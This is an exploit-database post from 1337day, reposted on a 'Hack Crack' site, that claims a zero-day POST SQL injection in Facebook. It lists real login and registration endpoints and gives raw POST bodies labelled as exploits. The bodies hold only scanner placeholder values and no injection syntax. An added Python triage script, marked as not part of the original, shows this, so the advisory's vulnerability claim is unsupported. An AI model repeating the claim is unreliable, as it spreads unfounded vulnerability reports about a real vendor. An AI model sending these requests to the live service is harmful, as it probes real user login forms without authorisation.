Facebook - Remote Post SQL Injection Vulnerability

Monday, 18 June 2012


-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0      _                   __           __       __                      1
1    /' \            __  /'__`\        /\ \__  /'__`\                    0
0   /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___            1
1   \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\           0
0      \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/            1
1       \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\            0
0        \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/            1
1                   \ \____/ >> Exploit database separated by exploit    0
0                    \/___/          type (local, remote, DoS, etc.)     1
1                                                                        1
0   [x] Official Website: http://www.1337day.com                         0
1   [x] Support E-mail  : mr.inj3ct0r[at]gmail[dot]com                   1
0                                                                        0
1               ==========================================               1
0               I'm Taurus Omar Member From Inj3ct0r TEAM                1
1               ==========================================               0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-1
|                                                                        |
| C _:_ A |        Facebook - Remote Post SQL Injection        | C _:_ A |
--------------------------------------------------------------------------

==> ABOUT ME:
--- TAURUS OMAR
--- INDEPENDENT SECURITY RESEARCHER
--- ACCESOILEGAL.BLOGSPOT.COM
--- @omartaurus
--- omar-taurus[at]dragonsecurity[dot]org 
--- omar-taurus[at]live[dot]com
 
==> INFO:
Author        : TAURUS OMAR
Category      : Webapps / 0day 
Title Exploit : Facebook - Remote Post SQL Injection 
Vendor        : Facebook
URL Vendor    : http://www.facebook.com/
0day exploits : 1337day.com Inj3ct0r Exploit DataBase 

==> SAMPLE REMOTE POST SQL INJECTION
http://www.facebook.com/login.php?login_attempt=1 [ Remote Post SQL Injection ]
http://www.facebook.com/r.php?possible_fb_user=1 [ Remote Post SQL Injection ]
http://www.facebook.com/r.php?locale=es_LA&possible_fb_user=1 [ Remote Post SQL Injection ]
http://www.facebook.com/find-friends/index.php^jsonp=1  [ Remote Post SQL Injection ]
https://www.facebook.com/r.php?fbpage_id=20531316728  [ Remote Post SQL Injection ]

==> EXPLOITS
+amp;extra_2=AdvertisingLink%3ACREATE_AN_AD&charset_test=&euro;,&acute;,%E2%82%AC,%C2%B4,%E6%B0%B4,%D0%94,%D0%84&timezone=&lgnrnd=172128_Wkmc&lgnjs=n&locale=es_LA&lsd=AVo_L9kt&email=WCRTESTINPUT000000&pass=WCRTESTINPUT000001&default_persistent=0&next=http://www.facebook.com/advertising/?campaign_id=402047449186&amp;placement=pflo&amp;extra_1=not-admgr-user
+trynum=1&charset_test=&euro;,&acute;,%E2%82%AC,%C2%B4,%E6%B0%B4,%D0%94,%D0%84&timezone=&lgnrnd=171806_rfMa&lgnjs=n&email=WCRTESTINPUT000000&pass=WCRTESTINPUT000001&default_persistent=0&login=Entrar&lsd=AVo_L9kt&next=https://www.facebook.com/browse/likes/?id=267999343307103&return_session=0&legacy_return=1&display=&session_key_only=0
+display=&session_key_only=0&trynum=1&charset_test=&euro;,&acute;,€,´,?,?,?&timezone=&lgnrnd=171806_rfMa&lgnjs=n&email=WCRTESTINPUT000000&pass=WCRTESTINPUT000001&default_persistent=0&login=Entrar&lsd=AVo_L9kt&next=https://www.facebook.com/browse/likes/?id=267999343307103&return_session=0&legacy_return=1
+login_str=wcrtestinput000000&password=wcrtestinput000001&lsd=avo_l9kt&importer_action=2&flow=2&type=1&callback_element_id=&tracked_params=[]
+charset_test=&euro;,&acute;,€,´,?,?,?&timezone=&lgnrnd=171816_HdJ7&lgnjs=n&email=WCRTESTINPUT000000&pass=WCRTESTINPUT000001&default_persistent=0&login=Entrar&lsd=AVo_L9kt&next=https://www.facebook.com/browse/likes/?id=267999343307103&return_session=0&legacy_return=1&display=&session_key_only=0&trynum=1
+legacy_return=1&display=&session_key_only=0&trynum=1&charset_test=&euro;,&acute;,€,´,?,?,?&timezone=&lgnrnd=171816_HdJ7&lgnjs=n&email=WCRTESTINPUT000000&pass=WCRTESTINPUT000001&default_persistent=0&login=Entrar&lsd=AVo_L9kt&next=https://www.facebook.com/browse/likes/?id=267999343307103&return_session=0
+r=115+reg_instance=whvet-ygwqujbcwr0iwc_jcb&openid_token=&uo_ip=&key=&re=&mid=&fid=&reg_dropoff_id=&reg_dropoff_code=&ro_invite_signup_id=737818179100220658&terms=on&abtest_registration_group=1&referrer=&md5pass=&validate_mx_records=1&asked_to_login=0&ab_test_data=&firstname=wcrtestinput000000&lastname=wcrtestinput000001&reg_email__=wcrtestinput000002&reg_email_confirmation__=wcrtestinput000003&reg_passwd__=wcrtestinput000004&captcha_persist_data=aznwcfsbvtu_hsnl9ddzwtkd6b-l6k4sw6w5bf-7m80q4tuehmrrvmaoezd5uw_qan5757cni6lxooxdduakfouj-hhexh-gmmxfsuvdwouj5dkt_hfam-0xgtltzhe1kanr7x1m7s5wfqr75mukog2ylpcxdgo_nyz1-et-whce93nr-ddraaovwntqbpq0p-d-xkbv6-gmuklicm6bdc2zc_ffdx7nysuktmdlqgsutenuvgc3-rndgbfwuv7vlez9uvamllsjvp2hu7lmq2abyguj_prr5vv7euuhuq8ebgq1arpbs9t7mdteq17stmys_ovowrc2eno9qzkspeh4brsgx8oi6lg0yeccwspf4a&captcha_session=cmqamvx4apmppd9boq5hew&extra_challenge_params=authp=nonce.tt.time.new_audio_default&amp;psig=qgnx8ieq-k9hb0c3ceqwfzaavyi&amp;nonce=cmqamvx4apmppd9boq5hew&amp;tt=ducvyhgabbkslmk3pkqnmd16nqi&amp;time=1339980632&amp;new_audio_default=1&recaptcha_type=password&captcha_response=wcrtestinput000005&sex=0&birthday_day=-1&birthday_month=-1&birthday_year=-1&lsd=avo_l9kt&invid=&a=&oi=&locale=es_la&app_bundle=&app_data=&reg_data=&app_id=&fbpage_id=20531316728&reg_oid=20531316728
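Added triage example (Python), not part of the original advisory: every body listed above carries values of the form WCRTESTINPUT followed by six digits, which is the placeholder pattern an automated web-vulnerability scanner substitutes into each form field it probes. The script below parses one of those bodies and reports which parameters received a probe placeholder and which values contain any SQL syntax at all, so a reviewer can separate "this field was fuzzed" from "this field carried an injection". The regexes, the function name and the second sample body are assumptions of this example; the first body is copied from the r.php importer request above.

```python
import re
from urllib.parse import parse_qsl

# Placeholder pattern seen throughout the advisory's bodies
# (e.g. WCRTESTINPUT000000, wcrtestinput000004). Assumption: six-digit suffix.
PROBE_MARKER = re.compile(r"^wcrtestinput\d{6}$", re.IGNORECASE)

# Coarse tell-tales of SQL syntax in a value. This is a triage heuristic,
# not an injection detector: an apostrophe in a surname trips it too.
SQL_SYNTAX = re.compile(r"'|\"|--|/\*|\b(?:union|select)\b", re.IGNORECASE)


def triage_body(body: str) -> dict:
    """Classify the parameters of one x-www-form-urlencoded POST body.

    Returns {'probed': [names whose value is a scanner placeholder],
             'sql_syntax': [names whose value contains SQL tell-tales],
             'total': number of parameters}.
    The leading '+' the advisory prefixes each body with is stripped first.
    """
    pairs = parse_qsl(body.lstrip("+"), keep_blank_values=True)
    probed = sorted({k for k, v in pairs if PROBE_MARKER.match(v)})
    sql_syntax = sorted({k for k, v in pairs if SQL_SYNTAX.search(v)})
    return {"probed": probed, "sql_syntax": sql_syntax, "total": len(pairs)}


# Body copied from the advisory (the r.php importer form).
ADVISORY_BODY = (
    "+login_str=wcrtestinput000000&password=wcrtestinput000001&lsd=avo_l9kt"
    "&importer_action=2&flow=2&type=1&callback_element_id=&tracked_params=[]"
)

# Constructed body, not from the advisory: an ordinary apostrophe in a
# surname shows why the SQL-syntax heuristic needs a human second look.
CONSTRUCTED_BODY = "firstname=Aoife&lastname=O%27Brien&email=wcrtestinput000002"


if __name__ == "__main__":
    for label, body in (("advisory", ADVISORY_BODY), ("constructed", CONSTRUCTED_BODY)):
        print(label, triage_body(body))
```

Run against the advisory's own bodies, the probed parameters are the free-text form fields (email, pass, login_str, firstname, lastname, reg_email__, and so on) and no value contains SQL syntax; a placeholder in a field shows only that the scanner fuzzed that field, which is the detail to check before treating a scanner listing as a confirmed injection.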


# 1337day.com [2012-06-18]
Copyright © 2011. HackStoob | Hack Crack Trick Software - All Rights Reserved